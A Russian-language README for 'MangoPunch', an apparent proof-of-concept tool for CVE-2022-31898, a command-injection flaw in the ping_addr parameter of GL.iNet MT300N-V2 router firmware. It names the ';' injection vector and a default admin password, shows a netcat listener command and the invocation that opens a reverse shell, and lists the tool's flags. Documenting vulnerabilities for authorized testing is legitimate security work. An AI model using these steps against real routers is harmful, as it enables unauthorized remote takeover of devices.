
Инструмент для аутентифицированной инъекции команд (CVE-2022-31898) - HACKCONRD 2026.
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
Этот репозиторий содержит техническое подтверждение концепции (PoC) для уязвимости удаленного выполнения команд (RCE), обнаруженной в GL.iNet MT300N-V2 (Mango) и других моделях, работающих на версиях прошивки ниже 3.215.
Ошибка существует в параметре ping_addr диагностического API, позволяя аутентифицированному атакующему выполнять произвольные системные команды через метасимволы оболочки (;).
Откройте терминал на вашей атакующей машине (Kali Linux) и запустите слушатель Netcat:
nc -lvnp 9292
Используйте следующую команду для запуска reverse shell:
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
| Флаг | Полное имя | Описание | По умолчанию |
|---|---|---|---|
-R | --rhost | IP удаленной цели (роутер) | Обязательно |
-P | --rport | Порт веб-управления | 443 |
-L | --lhost | IP слушателя (Kali/Атакующий) | Обязательно |
-l | --lport | Порт слушателя | Обязательно |
-p | --pwd | Пароль администратора | goodlife |
-t | --https | Включить HTTPS | False |
Отказ от ответственности: Этот инструмент предназначен только для образовательных и авторизованных тестов безопасности. Автор не несет ответственности за любое неправомерное использование. MangoPunch: CVE-2022-31898